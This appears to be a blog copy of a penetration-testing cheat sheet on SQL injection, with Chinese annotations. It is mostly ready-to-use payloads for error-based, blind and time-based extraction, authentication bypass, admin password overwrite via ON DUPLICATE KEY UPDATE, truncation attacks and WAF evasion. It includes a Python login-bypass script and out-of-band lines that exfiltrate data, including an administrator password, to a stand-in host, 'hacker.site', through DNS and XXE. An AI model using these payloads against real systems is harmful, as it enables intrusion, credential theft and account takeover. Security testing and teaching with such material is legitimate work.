<p>Complete Article: <a target="_blank" rel="noopener" href="https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f">https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f</a></p>
<h2 id="Exploiting-Error-based"><a href="#Exploiting-Error-based" class="headerlink" title="Exploiting Error based"></a>Exploiting Error based</h2><p>If for some reason you <strong>cannot</strong> see the <strong>output</strong> of the <strong>query</strong> but you can <strong>see the error messages</strong>, <strong>you can make this error messages to <strong>ex-filtrate</strong> data from the database.【大意：定制错误消息，需要在触发报错语句之前执行某些语句，并将执行结果拼接到触发的报错语句中，通过报错泄露执行结果】</strong><br>Following a similar flow as in the Union Based exploitation you could manage to dump the DB.</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># <span class="built_in">floor</span>() 报错原理：https:<span class="operator">/</span><span class="operator">/</span>www.secpulse.com<span class="operator">/</span>archives<span class="operator">/</span><span class="number">140616.</span>html</span><br><span class="line">(<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">and</span> <span class="type">row</span>(<span class="number">1</span>,<span class="number">1</span>)<span class="operator">&gt;</span>(<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>),concat(CONCAT(@<span class="variable">@VERSION</span>),<span class="number">0x3a</span>,<span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>))x <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">2</span>)a <span class="keyword">group</span> <span class="keyword">by</span> x limit <span class="number">1</span>))</span><br><span class="line"><span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>),concat(<span class="number">0x7e</span>,version(),<span class="number">0x7e</span>,<span class="built_in">floor</span>(rand(<span class="number">0</span>)<span class="operator">*</span><span class="number">2</span>))x <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">4</span>)y <span class="keyword">group</span> <span class="keyword">by</span> x;</span><br></pre></td></tr></table></figure>

<h2 id="Exploiting-Blind-SQLi"><a href="#Exploiting-Blind-SQLi" class="headerlink" title="Exploiting Blind SQLi"></a>Exploiting Blind SQLi</h2><p>In this case you cannot see the results of the query or the errors, but you can <strong>distinguished【区分】</strong> when the query <strong>return</strong> a <strong>true</strong> or a <strong>false</strong> response because there are different contents on the page.<br>In this case, you can <strong>abuse【利用】</strong> that behaviour to dump the database char by char:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">AND</span> <span class="keyword">SELECT</span> SUBSTR(table_name,<span class="number">1</span>,<span class="number">1</span>) <span class="keyword">FROM</span> information_schema.tables <span class="operator">=</span> <span class="string">&#x27;A&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="Exploiting-Error-Blind-SQLi"><a href="#Exploiting-Error-Blind-SQLi" class="headerlink" title="Exploiting Error Blind SQLi"></a>Exploiting Error Blind SQLi</h2><p>This is the <strong>same case as before</strong> but instead of distinguish between a true&#x2F;false response from the query you can <strong>distinguish between</strong> an <strong>error</strong> in the SQL query or not (maybe because the HTTP server crashes). Therefore, in this case you can force an SQLerror each time you guess correctly the char:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">AND</span> (<span class="keyword">SELECT</span> IF(<span class="number">1</span>,(<span class="keyword">SELECT</span> table_name <span class="keyword">FROM</span> information_schema.tables),<span class="string">&#x27;a&#x27;</span>))<span class="comment">-- -</span></span><br></pre></td></tr></table></figure>

<h2 id="Exploiting-Time-Based-SQLi"><a href="#Exploiting-Time-Based-SQLi" class="headerlink" title="Exploiting Time Based SQLi"></a>Exploiting Time Based SQLi</h2><p>In this case there <strong>isn’t</strong> any way to <strong>distinguish</strong> the <strong>response</strong> of the query based on the context of the page. But, you can make the page <strong>take longer to load</strong> if the guessed character is correct. We have already saw this technique in use before in order to <a href="./#confirming-with-timing">confirm a SQLi vuln</a>.</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="keyword">and</span> (<span class="keyword">select</span> sleep(<span class="number">10</span>) <span class="keyword">from</span> users <span class="keyword">where</span> SUBSTR(table_name,<span class="number">1</span>,<span class="number">1</span>) <span class="operator">=</span> <span class="string">&#x27;A&#x27;</span>)#</span><br></pre></td></tr></table></figure>

<h2 id="Stacked-Queries"><a href="#Stacked-Queries" class="headerlink" title="Stacked Queries"></a>Stacked Queries</h2><p>You can use stacked queries to <strong>execute multiple queries in succession【连续执行多个查询】</strong>. Note that while the subsequent queries are executed, the <strong>results</strong> are <strong>not returned to the application</strong>. <strong>Hence【因此】</strong> this technique is <strong>primarily【主要是】</strong> of use in relation to <strong>blind vulnerabilities</strong> where you can use a second query to trigger a DNS lookup, conditional error, or time delay.</p>
<p><strong>Oracle</strong> doesn’t support <strong>stacked queries.</strong> <strong>MySQL</strong>, <strong>Microsoft</strong> and <strong>PostgreSQL</strong> support them: <code>QUERY-1-HERE; QUERY-2-HERE</code></p>
<h2 id="Out-of-band-Exploitation"><a href="#Out-of-band-Exploitation" class="headerlink" title="Out of band Exploitation"></a>Out of band Exploitation</h2><p>If <strong>no-other</strong> exploitation method <strong>worked</strong>, you may try to make the database <strong>ex-filtrate【泄露】</strong> the info to an <strong>external host【外部主机】</strong> controlled by you. For example, via DNS queries:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># MySQL</span><br><span class="line"><span class="keyword">select</span> load_file(concat(<span class="string">&#x27;\\\\&#x27;</span>,version(),<span class="string">&#x27;.hacker.site\\a.txt&#x27;</span>));</span><br></pre></td></tr></table></figure>

<h3 id="Out-of-band-data-exfiltration-via-XXE"><a href="#Out-of-band-data-exfiltration-via-XXE" class="headerlink" title="Out of band data exfiltration via XXE"></a>Out of band data exfiltration via XXE</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># Oracle</span><br><span class="line">a<span class="string">&#x27; UNION SELECT EXTRACTVALUE(xmltype(&#x27;</span><span class="operator">&lt;</span>?xml version<span class="operator">=</span>&quot;1.0&quot; encoding<span class="operator">=</span>&quot;UTF-8&quot;?<span class="operator">&gt;</span><span class="operator">&lt;</span><span class="operator">!</span>DOCTYPE root [ <span class="operator">&lt;</span><span class="operator">!</span>ENTITY <span class="operator">%</span> remote <span class="keyword">SYSTEM</span> &quot;http://&#x27;||(SELECT password FROM users WHERE username=&#x27;administrator&#x27;)||&#x27;.hacker.site/&quot;<span class="operator">&gt;</span> <span class="operator">%</span>remote;]<span class="operator">&gt;</span><span class="string">&#x27;),&#x27;</span><span class="operator">/</span>l<span class="string">&#x27;) FROM dual-- -</span></span><br></pre></td></tr></table></figure>

<h2 id="Automated-Exploitation"><a href="#Automated-Exploitation" class="headerlink" title="Automated Exploitation"></a>Automated Exploitation</h2><p>Check the <a href="sqlmap/">SQLMap Cheetsheat</a> to exploit a SQLi vulnerability with <a target="_blank" rel="noopener" href="https://github.com/sqlmapproject/sqlmap"><strong>sqlmap</strong></a>.</p>
<h2 id="Tech-specific-info"><a href="#Tech-specific-info" class="headerlink" title="Tech specific info"></a>Tech specific info</h2><p>We have already discussed all the ways to exploit a SQLinjection vulnerability. Find some more tricks database technology dependant in this book:</p>
<ul>
<li><a href="mysql-injection/">MySQL</a></li>
<li><a href="postgresql-injection/">PostgreSQL</a></li>
</ul>
<p>Or you will find <strong>a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in</strong> <a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection"><strong>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection</strong></a></p>
<h2 id="Authentication-bypass"><a href="#Authentication-bypass" class="headerlink" title="Authentication bypass"></a>Authentication bypass</h2><p>List to try to bypass the login functionality:</p>
<p>content-ref url&#x3D;”..&#x2F;login-bypass&#x2F;sql-login-bypass.md”<br><a href="../login-bypass/sql-login-bypass.md">sql-login-bypass.md</a><br>ndcontent-ref</p>
<h3 id="Authentication-Bypass-Raw-MD5"><a href="#Authentication-Bypass-Raw-MD5" class="headerlink" title="Authentication Bypass (Raw MD5)"></a>Authentication Bypass (Raw MD5)</h3><p>When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;SELECT * FROM admin WHERE pass = &#x27;&quot;.md5($password,<span class="literal">true</span>).&quot;&#x27;&quot;</span><br></pre></td></tr></table></figure>

<p>Allowing an attacker to <strong>craft a string【制作一个字符串】</strong> with a <code>true</code> statement such as <code>&#39; or &#39;SOMETHING</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">md5(&quot;ffifdyop&quot;, <span class="literal">true</span>) <span class="operator">=</span> <span class="string">&#x27;or&#x27;</span><span class="number">6</span>É]é<span class="operator">!</span>r,ùíb</span><br></pre></td></tr></table></figure>

<p>Challenge demo available at <a target="_blank" rel="noopener" href="http://web.jarvisoj.com:32772/">http://web.jarvisoj.com:32772</a></p>
<h3 id="Hash-Authentication-Bypass"><a href="#Hash-Authentication-Bypass" class="headerlink" title="Hash Authentication Bypass"></a>Hash Authentication Bypass</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin<span class="string">&#x27; AND 1=0 UNION ALL SELECT &#x27;</span>admin<span class="string">&#x27;, &#x27;</span><span class="number">81</span>dc9bdb52d04dc20036dbd8313ed055<span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>

<p><strong>Recommended list</strong>:</p>
<p>You should use as username each line of the list and as password always: _<strong>Pass1234.</strong>_<br><em>(This payloads are also included in the big list mentioned at the beginning of this section)</em></p>
<p>file src&#x3D;”..&#x2F;..&#x2F;.gitbook&#x2F;assets&#x2F;sqli-hashbypass.txt”</p>
<h3 id="GBK-Authentication-Bypass"><a href="#GBK-Authentication-Bypass" class="headerlink" title="GBK Authentication Bypass"></a>GBK Authentication Bypass</h3><p>IF ‘ is being scaped you can use %A8%27, and when ‘ gets scaped it will be created: 0xA80x5c0x27 (<em>╘’</em>)</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">%</span>A8<span class="operator">%</span><span class="number">27</span> <span class="keyword">OR</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>;<span class="comment">-- 2</span></span><br><span class="line"><span class="operator">%</span><span class="number">8</span>C<span class="operator">%</span>A8<span class="operator">%</span><span class="number">27</span> <span class="keyword">OR</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span><span class="comment">-- 2</span></span><br><span class="line"><span class="operator">%</span>bf<span class="string">&#x27; or 1=1 -- --</span></span><br></pre></td></tr></table></figure>

<p>Python script:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://example.com/index.php&quot;</span> </span><br><span class="line">cookies = <span class="built_in">dict</span>(PHPSESSID=<span class="string">&#x27;4j37giooed20ibi12f3dqjfbkp3&#x27;</span>) </span><br><span class="line">datas = &#123;<span class="string">&quot;login&quot;</span>: <span class="built_in">chr</span>(<span class="number">0xbf</span>) + <span class="built_in">chr</span>(<span class="number">0x27</span>) + <span class="string">&quot;OR 1=1 #&quot;</span>, <span class="string">&quot;password&quot;</span>:<span class="string">&quot;test&quot;</span>&#125; </span><br><span class="line">r = requests.post(url, data = datas, cookies=cookies, headers=&#123;<span class="string">&#x27;referrer&#x27;</span>:url&#125;) </span><br><span class="line"><span class="built_in">print</span> r.text</span><br></pre></td></tr></table></figure>

<h3 id="Polyglot-injection【多语境注入】-multicontext"><a href="#Polyglot-injection【多语境注入】-multicontext" class="headerlink" title="Polyglot injection【多语境注入】 (multicontext)"></a>Polyglot injection【多语境注入】 (multicontext)</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SLEEP(<span class="number">1</span>) <span class="comment">/*&#x27; or SLEEP(1) or &#x27;&quot; or SLEEP(1) or &quot;*/</span></span><br></pre></td></tr></table></figure>

<h2 id="Insert-Statement"><a href="#Insert-Statement" class="headerlink" title="Insert Statement"></a>Insert Statement</h2><h3 id="Modify-password-of-existing-object-x2F-user"><a href="#Modify-password-of-existing-object-x2F-user" class="headerlink" title="Modify password of existing object&#x2F;user"></a>Modify password of existing object&#x2F;user</h3><p>To do so you should try to <strong>create a new object named as the “master object”</strong> (probably <strong>admin</strong> in case of users) modifying something:</p>
<ul>
<li>Create user named: <strong>AdMIn</strong> (uppercase &amp; lowercase letters)</li>
<li>Create a user named: <strong>admin&#x3D;</strong></li>
<li><strong>SQL Truncation Attack【sql截断攻击】</strong> (when there is some kind of <strong>length limit</strong> in the username or email) –&gt; Create user with name: <strong>admin [a lot of spaces] a</strong></li>
</ul>
<h4 id="SQL-Truncation-Attack"><a href="#SQL-Truncation-Attack" class="headerlink" title="SQL Truncation Attack"></a>SQL Truncation Attack</h4><p>If the database is vulnerable and the max number of chars for username is for example 30 and you want to impersonate the user <strong>admin</strong>, try to create a username called: “<em>admin [30 spaces] a</em>“ and any password.</p>
<p>The database will <strong>check</strong> if the introduced <strong>username</strong> <strong>exists</strong> inside the database. If <strong>not</strong>, it will <strong>cut</strong> the <strong>username</strong> to the <strong>max allowed number of characters</strong> (in this case to: “<em>admin [25 spaces]</em>“) and the it will <strong>automatically remove all the spaces at the end updating</strong> inside the database the user “<strong>admin</strong>“ with the <strong>new password</strong> (some error could appear but it doesn’t means that this hasn’t worked).</p>
<p>More info: <a target="_blank" rel="noopener" href="https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html">https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html</a> &amp; <a target="_blank" rel="noopener" href="https://resources.infosecinstitute.com/sql-truncation-attack/#gref">https://resources.infosecinstitute.com/sql-truncation-attack/#gref</a></p>
<p><em>Note: This attack will no longer work as described above in latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field will result in an error, and the insertion will fail. For more information about about this check</em> <a target="_blank" rel="noopener" href="https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation"><em>https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation</em></a>__</p>
<h3 id="MySQL-Insert-time-based-checking"><a href="#MySQL-Insert-time-based-checking" class="headerlink" title="MySQL Insert time based checking"></a>MySQL Insert time based checking</h3><p><strong>Add as much <code>&#39;,&#39;&#39;,&#39;&#39;</code> as you consider to exit the VALUES statement【大意：添加足够的 <code>&#39;,&#39;&#39;,&#39;&#39;</code>，用以闭合 VALUES 语境】</strong>. If delay is executed, you have a SQLInjection.</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name<span class="operator">=</span><span class="string">&#x27;,&#x27;&#x27;);WAITFOR%20DELAY%20&#x27;</span><span class="number">0</span>:<span class="number">0</span>:<span class="number">5</span><span class="string">&#x27;--%20-</span></span><br></pre></td></tr></table></figure>

<h3 id="ON-DUPLICATE-KEY-UPDATE"><a href="#ON-DUPLICATE-KEY-UPDATE" class="headerlink" title="ON DUPLICATE KEY UPDATE"></a>ON DUPLICATE KEY UPDATE</h3><p>ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Inject using payload:</span><br><span class="line">attacker_dummy@example.com&quot;, &quot;bcrypt_hash_of_qwerty&quot;), (&quot;admin@example.com&quot;, &quot;bcrypt_hash_of_qwerty&quot;) ON DUPLICATE KEY UPDATE password=&quot;bcrypt_hash_of_qwerty&quot; --</span><br><span class="line"></span><br><span class="line">The query would look like this:</span><br><span class="line">INSERT INTO users (email, password) VALUES (&quot;attacker_dummy@example.com&quot;, &quot;bcrypt_hash_of_qwerty&quot;), (&quot;admin@example.com&quot;, &quot;bcrypt_hash_of_qwerty&quot;) ON DUPLICATE KEY UPDATE password=&quot;bcrypt_hash_of_qwerty&quot; -- &quot;, &quot;bcrypt_hash_of_your_password_input&quot;);</span><br><span class="line"></span><br><span class="line">This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.</span><br><span class="line">Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to &quot;bcrypt_hash_of_qwerty&quot;.</span><br><span class="line"></span><br><span class="line">After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!</span><br></pre></td></tr></table></figure>

<h3 id="Extract-information"><a href="#Extract-information" class="headerlink" title="Extract information"></a>Extract information</h3><h4 id="Creating-2-accounts-at-the-same-time"><a href="#Creating-2-accounts-at-the-same-time" class="headerlink" title="Creating 2 accounts at the same time"></a>Creating 2 accounts at the same time</h4><p>When trying to create a new user and username, password and email are needed:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SQLi payload:</span><br><span class="line">username=TEST&amp;password=TEST&amp;email=TEST&#x27;),(&#x27;otherUsername&#x27;,&#x27;otherPassword&#x27;,(select flag from flag limit 1))-- -</span><br><span class="line"></span><br><span class="line">A new user with username=otherUsername, password=otherPassword, email:FLAG will be created</span><br></pre></td></tr></table></figure>

<h4 id="Using-decimal-or-hexadecimal"><a href="#Using-decimal-or-hexadecimal" class="headerlink" title="Using decimal or hexadecimal"></a>Using decimal or hexadecimal</h4><p>With this technique you can extract information creating only 1 account. It is important to note that you don’t need to comment anything.</p>
<p>Using <strong>hex2dec</strong> and <strong>substr</strong>:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+&#x27;</span></span><br></pre></td></tr></table></figure>

<p>To get the text you can use:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">__import__</span>(<span class="string">&#x27;binascii&#x27;</span>).unhexlify(<span class="built_in">hex</span>(<span class="number">215573607263</span>)[<span class="number">2</span>:])</span><br></pre></td></tr></table></figure>

<p>Using <strong>hex</strong> and <strong>replace</strong> (and <strong>substr</strong>):</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;+(select hex(replace(replace(replace(replace(replace(replace(table_name,&quot;j&quot;,&quot; &quot;),&quot;k&quot;,&quot;!&quot;),&quot;l&quot;,&quot;\&quot;&quot;),&quot;m&quot;,&quot;#&quot;),&quot;o&quot;,&quot;$&quot;),&quot;_&quot;,&quot;%&quot;)) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),&quot;j&quot;,&quot; &quot;),&quot;k&quot;,&quot;!&quot;),&quot;l&quot;,&quot;\&quot;&quot;),&quot;m&quot;,&quot;#&quot;),&quot;o&quot;,&quot;$&quot;),&quot;_&quot;,&quot;%&quot;)) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+&#x27;</span></span><br><span class="line"></span><br><span class="line">#<span class="keyword">Full</span> ascii uppercase <span class="keyword">and</span> lowercase replace:</span><br><span class="line"><span class="string">&#x27;+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),&quot;j&quot;,&quot; &quot;),&quot;k&quot;,&quot;!&quot;),&quot;l&quot;,&quot;\&quot;&quot;),&quot;m&quot;,&quot;#&quot;),&quot;o&quot;,&quot;$&quot;),&quot;_&quot;,&quot;%&quot;),&quot;z&quot;,&quot;&amp;&quot;),&quot;J&quot;,&quot;&#x27;</span>&quot;),&quot;K&quot;,&quot;`&quot;),&quot;L&quot;,&quot;(&quot;),&quot;M&quot;,&quot;)&quot;),&quot;N&quot;,&quot;@&quot;),&quot;O&quot;,&quot;$$&quot;),&quot;Z&quot;,&quot;<span class="operator">&amp;&amp;</span>&quot;)) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+&#x27;</span><br></pre></td></tr></table></figure>

<h2 id="Routed-SQL-injection"><a href="#Routed-SQL-injection" class="headerlink" title="Routed SQL injection"></a>Routed SQL injection</h2><p>Routed SQL injection is a situation where the injectable query is not the one which gives output but the output of injectable query goes to the query which gives output. (<a target="_blank" rel="noopener" href="http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt">Paper</a>)<br><strong>“Routed SQL injection”</strong> 情况与 <strong>“Exploiting Hidden Union Based”</strong> 介绍文章第三种情况一样。</p>
<p><a target="_blank" rel="noopener" href="http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt">Paper</a> 中的演示代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$servername</span> = <span class="string">&quot;localhost&quot;</span>;</span><br><span class="line"><span class="variable">$username</span> = <span class="string">&quot;root&quot;</span>;</span><br><span class="line"><span class="variable">$password</span> = <span class="string">&quot;root&quot;</span>;</span><br><span class="line"><span class="variable">$db_database</span> = <span class="string">&quot;finecms&quot;</span>;</span><br><span class="line"> </span><br><span class="line"><span class="comment">// 创建连接</span></span><br><span class="line"><span class="variable">$conn</span> = <span class="title function_ invoke__">mysql_connect</span>(<span class="variable">$servername</span>, <span class="variable">$username</span>, <span class="variable">$password</span>);</span><br><span class="line"><span class="title function_ invoke__">mysql_select_db</span>(<span class="variable">$db_database</span>);</span><br><span class="line"><span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line"><span class="variable">$query</span>=<span class="string">&quot;SELECT uid,password FROM fn_member WHERE uid=&#x27;<span class="subst">$id</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$result</span>=<span class="title function_ invoke__">mysql_query</span>(<span class="variable">$query</span>,<span class="variable">$conn</span>))<span class="keyword">die</span>(<span class="string">&quot;Error While Selection process : &quot;</span> . <span class="title function_ invoke__">mysql_error</span>());</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">mysql_num_rows</span>(<span class="variable">$result</span>) == <span class="number">0</span>)<span class="keyword">die</span>();</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$result</span>, MYSQL_ASSOC);</span><br><span class="line"><span class="variable">$query</span>=<span class="string">&quot;SELECT username FROM fn_member WHERE password=&#x27;&quot;</span>.<span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>].<span class="string">&quot;&#x27;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;font color=red&gt;This is the query which gives you Output : &lt;/font&gt;<span class="subst">$query</span>&lt;br&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$result</span>=<span class="title function_ invoke__">mysql_query</span>(<span class="variable">$query</span>,<span class="variable">$conn</span>))<span class="keyword">die</span>(<span class="string">&quot;Error While Selection process : &quot;</span> . <span class="title function_ invoke__">mysql_error</span>());</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">mysql_num_rows</span>(<span class="variable">$result</span>) == <span class="number">0</span>)<span class="keyword">die</span>(<span class="string">&quot;Invalid Input parameter&quot;</span>);</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$result</span>, MYSQL_ASSOC);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;Username is : &#x27;</span> . <span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>] . <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>Example:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#Hex <span class="keyword">of</span>: <span class="number">-1</span><span class="string">&#x27; union select login,password from users-- a</span></span><br><span class="line"><span class="string">-1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061</span> <span class="comment">-- a</span></span><br></pre></td></tr></table></figure>

<h2 id="WAF-Bypass"><a href="#WAF-Bypass" class="headerlink" title="WAF Bypass"></a>WAF Bypass</h2><h3 id="No-spaces-bypass"><a href="#No-spaces-bypass" class="headerlink" title="No spaces bypass"></a>No spaces bypass</h3><p>No Space (%20) - bypass using whitespace alternatives</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">09</span><span class="keyword">and</span><span class="operator">%</span><span class="number">091</span><span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">09</span><span class="comment">--</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>Dand<span class="operator">%</span><span class="number">0</span>D1<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>D<span class="comment">--</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>Cand<span class="operator">%</span><span class="number">0</span>C1<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>C<span class="comment">--</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>Band<span class="operator">%</span><span class="number">0</span>B1<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>B<span class="comment">--</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>Aand<span class="operator">%</span><span class="number">0</span>A1<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">0</span>A<span class="comment">--</span></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span>A0and<span class="operator">%</span>A01<span class="operator">=</span><span class="number">1</span><span class="operator">%</span>A0<span class="comment">--</span></span><br></pre></td></tr></table></figure>

<p>No Whitespace - bypass using comments</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="comment">/*comment*/</span><span class="keyword">and</span><span class="comment">/**/</span><span class="number">1</span><span class="operator">=</span><span class="number">1</span><span class="comment">/**/</span><span class="comment">--</span></span><br></pre></td></tr></table></figure>

<p>No Whitespace - bypass using parenthesis</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span>(<span class="number">1</span>)<span class="keyword">and</span>(<span class="number">1</span>)<span class="operator">=</span>(<span class="number">1</span>)<span class="comment">--</span></span><br></pre></td></tr></table></figure>

